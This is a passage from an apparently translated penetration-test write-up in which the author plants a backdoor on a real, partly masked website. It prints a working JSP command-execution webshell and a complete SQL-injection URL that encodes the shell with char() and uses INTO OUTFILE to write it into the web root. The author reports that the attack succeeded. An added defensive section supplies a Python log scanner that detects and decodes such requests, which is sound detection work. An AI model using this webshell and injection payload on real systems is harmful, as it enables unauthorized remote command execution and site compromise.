6. Exporting a webshell via injection
Suppose we did not obtain the weak telnet password; how, then, do we get a webshell on this site? angel, in the article <
The jsp webshell we use here is:
<%@ page import="java.io.*" %>
<%
try {
    String cmd = request.getParameter("cmd");
    Process child = Runtime.getRuntime().exec(cmd);
    InputStream in = child.getInputStream();
    int c;
    while ((c = in.read()) != -1) {
        out.print((char)c);
    }
    in.close();
    try {
        child.waitFor();
    } catch (InterruptedException e) {
        e.printStackTrace();
    }
} catch (IOException e) {
    System.err.println(e);
}
%>
We strip the line breaks from the code above and convert it to ASCII codes, as shown in Figure 11.

Then submit the following address in IE:
http://www.***.***.cn/content.jsp?tablename=zhxw&id=1530%20and%201=2%20union%20select%201,1,char(60,37,64,32,112,97,103,101,32,105,109,112,111,114,116,61,34,106,97,118,97,46,105,111,46,42,34,32,37,62,60,37,116,114,121,32,123,83,116,114,105,110,103,32,99,109,100,32,61,32,114,101,113,117,101,115,116,46,103,101,116,80,97,114,97,109,101,116,101,114,40,34,99,109,100,34,41,59,80,114,111,99,101,115,115,32,99,104,105,108,100,32,61,82,117,110,116,105,109,101,46,103,101,116,82,117,110,116,105,109,101,40,41,46,101,120,101,99,40,99,109,100,41,59,73,110,112,117,116,83,116,114,101,97,109,32,105,110,32,61,32,99,104,105,108,100,46,103,101,116,73,110,112,117,116,83,116,114,101,97,109,40,41,59,105,110,116,32,99,59,119,104,105,108,101,32,40,40,99,32,61,105,110,46,114,101,97,100,40,41,41,32,33,61,32,45,49,41,32,123,111,117,116,46,112,114,105,110,116,40,40,99,104,97,114,41,99,41,59,125,105,110,46,99,108,111,115,101,40,41,59,116,114,121,32,123,99,104,105,108,100,46,119,97,105,116,70,111,114,40,41,59,125,32,99,97,116,99,104,40,73,110,116,101,114,114,117,112,116,101,100,69,120,99,101,112,116,105,111,110,32,101,41,32,123,101,46,112,114,105,110,116,83,116,97,99,107,84,114,97,99,101,40,41,59,125,125,32,99,97,116,99,104,32,40,73,79,69,120,99,101,112,116,105,111,110,32,101,41,32,123,83,121,115,116,101,109,46,101,114,114,46,112,114,105,110,116,108,110,40,101,41,59,125,37,62),1,1,1%20from%20admin%20into%20outfile%20'/www/ping/pingping.jsp'/*
The result returned is shown in Figure 12.

Heh, it reports an error, but it has actually succeeded! Connecting directly in IE to the address of the backdoor in this web directory gives the result shown in Figure 13.

It really did succeed!
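From the defender's side, the request above leaves a very distinctive trace in the web server's access log: a URL-encoded UNION SELECT, a long char(...) list used to smuggle the JSP source past quoting, and INTO OUTFILE pointing at the web root. The following script is an added example, not code from the original article; it assumes an Apache/Nginx-style access log with a quoted request line, and the three log lines it scans are constructed for the demonstration (the second one reuses the page's injection pattern with a shortened char() payload). It decodes the URL, expands each char() call back into the text it builds, and reports which indicators fired, so an analyst can see exactly what was written to disk.

```python
"""Flag and decode file-writing SQL-injection attempts in web access logs.

Added example for this page (not the author's code). It assumes an
Apache/Nginx-style access log in which the request line is quoted; the log
lines below are constructed for the demonstration.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample: a normal request, the page's injection pattern with a
# shortened char() payload, and a benign query that merely contains "union".
SAMPLE_LOG = """\
10.0.0.5 - - [06/Apr/2007:10:00:01 +0800] "GET /content.jsp?tablename=zhxw&id=1530 HTTP/1.1" 200 5120
10.0.0.9 - - [06/Apr/2007:10:00:07 +0800] "GET /content.jsp?tablename=zhxw&id=1530%20and%201=2%20union%20select%201,1,char(60,37,64,32,112,97,103,101,32,37,62),1,1,1%20from%20admin%20into%20outfile%20'/www/ping/pingping.jsp'/* HTTP/1.1" 500 311
10.0.0.7 - - [06/Apr/2007:10:00:15 +0800] "GET /search.jsp?q=union%20station HTTP/1.1" 200 2048
"""

# Request line: method, URL (a valid URL contains no spaces), protocol.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"')
# MySQL char(n1,n2,...) call used to build a string without quote characters.
CHAR_CALL_RE = re.compile(r'char\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)', re.IGNORECASE)

# Indicators evaluated on the fully decoded request.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b", re.IGNORECASE),
    "jsp_scriptlet": re.compile(r"<%"),   # decoded payload is JSP source
}


def decode_char_calls(text: str) -> str:
    """Replace each char(...) call with the string it builds (byte values only)."""
    def repl(m):
        codes = [int(n) for n in m.group(1).split(",")]
        if any(c > 255 for c in codes):
            return m.group(0)          # not a byte string; leave untouched
        return bytes(codes).decode("latin-1")
    return CHAR_CALL_RE.sub(repl, text)


def analyze_request(request: str) -> dict:
    """Decode one request URL and list the indicators it triggers."""
    url_decoded = unquote_plus(request)       # %20 -> ' ', %27 -> "'", ...
    payload = decode_char_calls(url_decoded)  # char(...) -> literal text
    hits = []
    if CHAR_CALL_RE.search(url_decoded):
        hits.append("char_encoding")
    hits += [name for name, rx in INDICATORS.items() if rx.search(payload)]
    return {"request": request, "decoded": payload, "indicators": hits}


def scan_log(log_text: str) -> list:
    """Return a finding for every log line that triggers at least one indicator."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        result = analyze_request(m.group(1))
        if result["indicators"]:
            result["line"] = lineno
            findings.append(result)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {', '.join(f['indicators'])}")
        print("  decoded:", f["decoded"])
```

Only the second sample line is reported, with all four indicators and the decoded text `<%@ page %>` followed by the INTO OUTFILE target path; the third line shows that the word "union" alone does not trigger a finding. The write itself also depends on the database account holding the FILE privilege and on MySQL's secure_file_priv setting not restricting the output directory; a web root that the mysqld process cannot write to stops the final step regardless of the injection.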
Our penetration test ends here. My skills are limited, and the article inevitably has shortcomings; please point them out. My QQ is 874842 and my email is wilse4694@sina.com.
References
1. http://www.4ngel.net/article/36.htm
2. http://www.4ngel.net/article/30.htm
3. http://www.securiteam.com/exploits/6G00P1PC0U.html
4. http://www.securiteam.com/securitynews/5MP031P1FG.html